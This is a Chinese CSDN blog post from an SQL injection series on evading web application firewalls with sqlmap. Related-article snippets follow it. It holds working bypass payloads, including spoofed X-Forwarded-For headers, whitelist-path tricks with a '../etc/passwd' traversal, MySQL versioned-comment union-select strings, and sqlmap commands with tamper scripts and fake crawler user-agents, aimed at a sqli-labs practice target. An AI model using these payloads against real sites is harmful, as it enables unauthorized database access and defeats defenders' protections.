sql注入-08 sqlmap绕过waf

最新推荐文章于 2024-05-22 11:02:40 发布
最新推荐文章于 2024-05-22 11:02:40 发布
阅读量3.6k 收藏 17
点赞数
文章标签: sql 网络安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44576725/article/details/121385099
版权

sqlmap绕过waf

1、绕过的方法–白名单

方式一:ip白名单

从网络层tcp、udp获取的ip,这种一般伪造不来。
如果是通过脚本获取客户端的IP,这样就可能存在伪造IP绕过的情况。
测试方法:修改http的header来bypass waf
x-forwarded-for 
x-remote-IP 
x-originating-IP 
x-remote-addr 
x-Real-ip

方式二:静态资源

特定的静态资源后缀请求,常见的静态文件(.js .jpg .swf .css等等),
类似白名单机制,waf为了检测 效率,不去检测这样一些静态文件名后缀的请求。
http://10.9.9.201/ sql.php?id=1 
http://10.9.9.201/sql.php/1.js?id=1 
备注: Aspx/php只识别到前面的.aspx/.php后面基本不识别

方式三:url白名单

为了防止误拦,部分waf内置默认的白名单列表,如admin/manager/system等管理后台。
只要url中存在 白名单的字符串,就作为白名单不进行检测。
常见的url构造姿势: http://10.9.9.201/sql.php/admin.php?id=1 
http://10.9.9.201/sql.php?a=/manage/&b=../etc/passwd
http://10.9.9.201/../../../ manage/../sql.asp?id=2
waf通过/manage/"进行比较,只要url中存在/manage/就作为白名单不进行检测,
这样我们可以通过/sql.php?a=/manage/&b=../etc/passwd 绕过防御规则。

方式四:爬虫白名单

部分waf有提供爬虫白名单(各大浏览器的爬虫)的功能,识别爬虫的技术一般有两种: 
1、根据useragent 
2、通过行为来判断 UserAgent可以很容易欺骗,我们可以伪装成爬虫尝试绕过。
User Agent switcher (Firefox附加组 件):
下载地址: https : //addons.mozilla.org/en-us/firefox/addon/user-agent-switcher/

2、利用数据库特性

这里展示利用mysql的数据库特性进行注入:

  • 通过插入版本号:/!版本号/
%20union%20/*!44509select*/%201,2,3 
/*!44509select*/:通过插入版本号(4.45.09), 绕过检测机制

%20/*!44509union*/%23x%0aselect%201,2,3
id=1/**&id=-1%20union%20select%201,2,3%23*/ 特殊符号
%20union%20all%23%0a%20select%201,2,3%23

3、利用sqlmap的自带脚本或自写脚本

sqlmap会自带一些绕过脚本,在tamper文件夹下:

image-20211117171945872

也可以自己添加Python脚本,利用tamper参数:–temp=脚本文件名来调用:

D:\Python\sqlmap>Python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=2" --tamper=base64encode.py

4、设置sqlmap的随机头部

因为waf一般能检测出sqlmap的自带头部:sqlmap/1.4.7 (http://sqlmap.org),从而进行拦截。所以要设置随机头部,利用**–random-agent**:

D:\Python\sqlmap>Python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=2" --tamper=base64encode.py --random-agent

若要进行抓包查看数据,则添加代理参数**–proxy**=http://127.0.0.1:8888 ,可通过抓包工具进行抓包:

D:\Python\sqlmap>Python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=2" --tamper=base64encode.py --random-agent --proxy=http://127.0.0.1:8888

5、采用工具注入被拉黑的解决措施

  • 方法一:采用延时注入

    D:\Python\sqlmap>Python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=2" --tamper=base64encode.py --random-agent --proxy=http://127.0.0.1:8888 --delay 1

    改善时间过快,导致流量过大被拦截的问题。

  • 方法二:采用代理池

  • 方法三:换用搜索引擎的user-agent

    D:\Python\sqlmap>Python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=2" --tamper=base64encode.py --user-agent="
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" --proxy=http://127.0.0.1:8888

    这里用了百度搜索的user-agent,各搜索引擎的user-agent可参考这篇文章:https://blog.csdn.net/Jack0610/article/details/112896700

拓海AE
关注
  • 0
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap绕过防火墙
weixin_42917890的博客
04-06 1232
0x00 前言    现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环...
关于sql注入这一篇就够了(适合入门)
qq_53105813的博客
01-07 4928
sql注入详解
sqlmap 使用tamper脚本绕过WAF
最新发布
xf3401837266的博客
05-22 722
sqlmap 使用tamper脚本绕过WAF
第18、19天:WEB漏洞-WAF绕过注入以及SQLMAP绕过WAF
cailme的博客
05-18 1568
渗透测试day18、19天
渗透测试-sqlmap绕过WAF脚本编写
lza20001103的博客
04-21 4432
渗透测试-sqlmap绕过WAF脚本编写
实战sqlmap绕过WAF
zkaqlaoniao的博客
10-26 3913
前言 随着最近几年安全行业的兴起,市场关注度的不断提升,安全防护的软件也在不断提升,不在是那个随便找一个站就能马上发现漏洞了,没有以前那么多所谓的“靶场”了,在这次的实战中遇到的SQL注入与其他的有点不一样,需要考虑的东西很多,写得不好的地方师傅们勿喷。 实战演示 通过前期的信息收集发现存在注入的页面如下: 直接使用sqlmap跑发现出现如下错误: python2 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxx..
SQL注入/WAF】使用sqlmap 绕过防火墙进行注入测试
xuchen16的博客
09-26 1791
转载自:https://blog.csdn.net/qq_35420342/article/details/79951355 0x00 前言  现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入...
SQL注入WAF绕过
xdjxi的博客
03-14 1万+
SQL注入WAF绕过的基本方法 WAF绕过 WAF(Web Application Firewall)的中文名称叫做“Web应用防火墙”,它依罪女全策略对Web应用程序进行保护。安全策略是WAF的灵魂,所谓的“绕过WAF”就是指通过某种方式无视WAF的安全策略,达到攻击的目的。 方法1:变换大小写 实例:比如WAF拦截了union,那就使用Union、UnloN等方式绕过。 方法2:编码 实例1:WAF检测敏感字'~,则可以用Ox7e代替,如extractvalue(1 ,concat('~.
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
sqlmap中文手册-sql注入自动化测试工具
07-19
此外,SQLMap还具备绕过WAF(Web应用防火墙)的能力,提高了在复杂环境下的成功率。 在保持工具最新性方面,用户可以通过官方GitHub仓库获取最新版本,了解更新日志,确保使用的始终是最先进的工具。同时,社区的...
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
SQLMAP通过自动化的智能探测和多种技术,如盲注、时间延迟注入、错误注入等,来判断目标应用程序是否存在SQL注入漏洞,并且可以绕过WAF的检测。这些脚本是基于不同的数据库系统(如MySQL、PostgreSQL、Oracle等)的...
那些年我们绕过WAF
05-07
描述中提到,本文总结了WAF绕过的方法,旨在帮助测试人员在进行安全性测试时,能够有效地绕过WAF的限制。 以下是一些具体的绕过WAF的策略和技术: 1. **编码转换**: - **URL编码**:攻击者可以使用URL编码来隐藏...
实战绕过双重waf(玄武盾+程序自身过滤)结合编写sqlmap的tamper获取数据.pdf
03-24
实战绕过双重waf 玄武盾+程序自身过滤 结合编写sqlmap的tamper获取数据 文档来自互联网仅做学习使用,请勿使用文档相关内容进行违法犯罪活动。
SQLmap简介以及防火墙绕过方法
weixin_30526593的博客
01-23 480
简介 许多现实中对于网站的攻击往往是由于网站没有及时更新或者对于用户的输入没有进行检查。从缓冲区溢出说起,这样一种针对系统脆弱性的威胁,最根本的问题还是在于对于用户的输入没有进行检查。作为主要威胁之一的SQL注入带来了人们对于其应用和数据库的担忧。这个问题的出现有十年的时间了,但是现在仍旧在许多网站中出现。SQL注入就像许多当前主要的的web应用安全攻击问题也被划归在了对于用户输...
sqlmap绕过d盾_姿势分享——SQL注入bypass D盾
weixin_39594080的博客
12-09 5500
首先感谢兄弟们的支持与关注,我们的成长离不开您的陪伴在我们做项目的途中经常会遇到各种各样的waf,防火墙等来拦截我们的payload,这很是让渗透测试人员头疼,其实网上就有很多关于waf绕过原理的文章,这篇文章就是想告诉大家,当大家理解了网上关于waf绕过的文章的内容并对其原理了解后,其实把理论深化进实践中并没有多困难,本篇文章就是将一个简单常规的小思路实践了一下,便成功绕过了D盾的wa...
SQLMAP工具之实战渗透技巧二
Longwaer
02-07 1318
学习掌握SQLMAP工具各种小技巧,便于渗透测试中的各种使用。
绕过WAF-SQL
qq_30787769的博客
12-09 327
1.首先WAF的核心基本上是正则匹配,又由于安全和客户体验性挂钩,所以它不会什么都拦截,其拦截对象是搭配式语句 2.基本的绕过手法: 1. 如果and 1=1 被拦截时可以试试 and -1=-1试试,或者and true试试(一般没用) 2. 可以用&代替and,但是在url上&是连接的意思,所以需要写&的url编码 3. ?id=1可以写成?id=2-1 如果执行...
史上最详细的sqlmap使用教程
热门推荐
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQLSQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqlmap绕过waf注入
05-21
SQLMap是一款常用的SQL注入工具,但是在一些情况下,可能会被Web应用程序防火墙(WAF)检测到并且阻止进一步的注入攻击。下面是一些绕过WAFSQLMap注入技巧: 1. 修改HTTP头部 在SQLMap中使用`--headers`选项来修改HTTP头部,例如: ``` sqlmap -u "http://example.com?id=1" --headers="User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" ``` 这将向请求添加一个自定义的User-Agent头部,从而绕过WAF的检测。 2. 使用代理 使用代理服务器时,WAF通常无法检测到SQL注入攻击,因为它只能检测来自客户端的请求。在SQLMap中使用`--proxy`选项来指定代理服务器,例如: ``` sqlmap -u "http://example.com?id=1" --proxy=http://127.0.0.1:8080 ``` 这将使用本地代理服务器进行注入攻击。 3. 使用多个随机User-Agent头部 使用多个随机的User-Agent头部可以使WAF难以检测到SQL注入攻击。在SQLMap中使用`--random-agent`选项来随机生成User-Agent头部,例如: ``` sqlmap -u "http://example.com?id=1" --random-agent ``` 这将在每个请求中使用随机生成的User-Agent头部。 4. 使用不同的HTTP方法 WAF通常只检测常见的HTTP方法,如GET和POST。在SQLMap中使用`--method`选项来指定不同的HTTP方法,例如: ``` sqlmap -u "http://example.com?id=1" --method=PUT ``` 这将使用PUT方法进行注入攻击,从而绕过WAF的检测。 5. 使用Tamper脚本 Tamper脚本是SQLMap的一个功能,可以修改SQL注入的请求和响应。在SQLMap中使用`--tamper`选项来指定Tamper脚本,例如: ``` sqlmap -u "http://example.com?id=1" --tamper=space2comment ``` 这将使用space2comment Tamper脚本,将空格转换为注释,从而绕过WAF的检测。 总之,以上这些技巧并不一定都能够成功绕过WAF的检测,要根据具体情况选择合适的方法。同时,为了避免被WAF检测到,也可以使用其他工具或手动注入的方式来进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值